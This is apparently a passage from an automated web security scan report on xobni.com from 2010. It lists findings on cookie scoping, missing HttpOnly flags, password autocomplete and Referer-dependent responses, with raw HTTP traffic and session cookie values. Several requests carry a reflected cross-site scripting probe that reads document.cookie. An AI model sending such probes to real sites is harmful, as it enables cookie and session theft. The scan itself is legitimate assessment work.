Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...

6.7. http://www.xobni.com/lp/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /lp/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...

7. Cookie without HttpOnly flag set
There are 8 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-Cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



7.1. http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; __utma=56318370.535260956.1292274982.1292274982.1292274982.1

Response

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:01:19 GMT
Server: Apache
Set-Cookie: PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 7805

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...

7.2. http://www.xobni.com/support/troubleshooter.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /support/troubleshooter.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/troubleshooter.php HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:11 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tree_session_id=455353; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Length: 3952
Connection: close
Content-Type: text/html; charset=UTF-8


<HTML>
<HEAD>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<TITLE>Troubleshooter</TITLE>
<style type="text/css">

.rounded-tr {
   position:absolute;top:0px;right:0px;
}
.round
...[SNIP]...

7.3. http://www.xobni.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/mobile81ff6'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Effa1c61d19d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.1.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 21477

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...

7.4. http://www.xobni.com/download

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Referer: http://www.xobni.com/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.2.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 9823

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...

7.5. http://www.xobni.com/download/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:14:58 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9767

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...

7.6. http://www.xobni.com/download/12341

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/12341

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/12341 HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:51 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12341; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9877

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...

7.7. http://www.xobni.com/download/latest

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /download/latest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /download/latest HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:04:52 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Set-Cookie: downloaded_version=12772; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 9535

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Download Xobni, t
...[SNIP]...

7.8. http://www.xobni.com/lp/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /lp/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /lp/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:39 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: trigger_id=10432362; Domain=.xobni.com; Max-Age=31556926; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 21486

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Xobni - Outlook P
...[SNIP]...

8. Password field with autocomplete enabled
There are 4 instances of this issue:

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).


8.1. http://www.xobni.com/account/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /account/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /account/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.7.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 10304

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<div id="account_login">
           <form name="login" method="post" action="https://www.xobni.com/account/">
           <input type="hidden" name="loginattempt" value="y">
...[SNIP]...
<td align="left"><input name="password" type="password" class="form_text_big" size="20"></td>
...[SNIP]...

8.2. http://www.xobni.com/account/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /account/

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /account/ HTTP/1.1
Host: www.xobni.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; trigger_id=10432362; downloaded_version=12772; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __utmb=56318370.7.10.1292288423

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:01:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Length: 10304

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<div id="account_signup" style="border-left:1px solid #ddd;padding-left:20px;">
           <form name="login" method="post" action="https://www.xobni.com/account/">
           <input type="hidden" name="createattempt" value="y">
...[SNIP]...
<td align="left"><input name="password" type="password" class="form_text_big" size="20" value=""></td>
...[SNIP]...
<td align="left"><input name="password_confirm" type="password" class="form_text_big" size="20" value=""></td>
...[SNIP]...

8.3. http://www.xobni.com/fr-fr/account/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /fr-fr/account/

Issue detail

The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /fr-fr/account/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<div id="account_signup" style="border-left:1px solid #ddd;padding-left:20px;">
           <form name="login" method="post" action="https://www.xobni.com/account/">
           <input type="hidden" name="createattempt" value="y">
...[SNIP]...
<td align="left"><input name="password" type="password" class="form_text_big" size="20" value=""></td>
...[SNIP]...
<td align="left"><input name="password_confirm" type="password" class="form_text_big" size="20" value=""></td>
...[SNIP]...

8.4. http://www.xobni.com/fr-fr/account/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.xobni.com
Path:   /fr-fr/account/

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

Request

GET /fr-fr/account/ HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response

HTTP/1.1 200 OK
Date: Tue, 14 Dec 2010 01:15:28 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 10640

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Your Xobni Accoun
...[SNIP]...
<div id="account_login">
           <form name="login" method="post" action="https://www.xobni.com/account/">
           <input type="hidden" name="loginattempt" value="y">
...[SNIP]...
<td align="left"><input name="password" type="password" class="form_text_big" size="20"></td>
...[SNIP]...

9. Referer-dependent response
There are 10 instances of this issue:

Issue description

The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.

Common explanations for Referer-dependent responses include:

Issue remediation

The Referer header is not a robust foundation on which to build any security measures, such as access controls or defenses against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.

If the content of responses is updated based on Referer data, then the same defenses against malicious input should be employed here as for any other kind of user-supplied data.



9.1. http://www.xobni.com/enterprise/contact

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.xobni.com
Path:   /enterprise/contact

Request 1

GET /enterprise/contact HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.xobni.com/
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 1

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:57 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7759

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=http%3A%2F%2Fwww.xobni.com%2F&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">Über Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>Partner</h3>
       <ul>
           <li><a href="/partners">Überblick</a></li>
           <li><a href="/partners/partners_content">Content-Partner</a></li>
       </ul>
   </div>
   <div class="footergroup">
       <h3>AGB</h3>
       <ul>
           <li><a href="/legal/trademarks">Marken</a></li>
           <li><a href="/legal/privacy">Datenschutzerklärung</a></li>
           <li><a href="/legal/license">Lizenzvertrag</a></li>
           <li><a href="/legal/tos">Servicebedingungen</a></li>
       </ul>
   </div>
   <div class="footercolophon">
       <span id="footer_language">Sprache: <span>Deutsch</span></span><br /><br />
       Copyright ©2006-2010 Xobni Corporation.<br />
       Alle Rechte vorbehalten.<br /><br />
       539 Bryant St, Suite 402 <br />San Francisco, CA 94107<br />
   </div>
   <br class="cl" />
</div>
</div>

<div id="menu_language" class="pulldownmenu">
   <div class="pulldowncontents">
<a href='/enterprise/contact?lc=en'>English</a><a href='/enterprise/contact?lc=de'>Deutsch</a><a href='/enterprise/contact?lc=fr'>Francais</a>
   </div>
</div>

<div id="menu_products" class="pulldownmenu " style="display:none; width:320px;"><div class="pulldowncontents">                <a href="/learnmore/" onClick="recordClicksOnPage(this, 'click', '/homepage/productmenu/free'); r
...[SNIP]...

Request 2

GET /enterprise/contact HTTP/1.1
Host: www.xobni.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=56318370.1292274982.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; trigger_id=10432362; PHPSESSID=e03ee23b55867c79e8c5d920c1893ddf; __utma=56318370.535260956.1292274982.1292274982.1292288423.2; __utmc=56318370; __qca=P0-416125978-1292288465032; __utmb=56318370.15.10.1292288423; downloaded_version=12772;

Response 2

HTTP/1.1 404 Not Found
Date: Tue, 14 Dec 2010 01:13:59 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 7730

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML>
<HEAD>
   <meta http-equiv='Content-type' content='text/html;charset=UTF-8' />
   <TITLE>Page Not Found</T
...[SNIP]...
<a href="/errors/404.php?report_my_error=1&source=&asked=test"><b>Please report the error</b></a></h2>
           <br class="cl" />
       </div>
       <div id="pagination">
           <div class="ctas">
               <div class="cta navcta" onclick="document.location.href = 'http://www.xobni.com';">
                   <h4>Go to</h4>
                   <h3><a href="#">xobni.com</a></h3>
               </div>
               
           </div>
           <br class="cl" />
       </div>
       <br class="cl" />
   </div>
</div>

<div id="main_footer">
<div id="cloudfooter">
   <div class="footergroup">
       <h3>Das Unternehmen</h3>
       <ul>
           <li><a href="/about">..ber Xobni</a></li>
           <li><a href="/press">Presse</a></li>
           <li><a href="/about/jobs">Stellenangebote</a></li>
           <li><a href="/about/opensource">Open Source</a></li>
           <li><a href="/about/contact">Feedback</a></li>
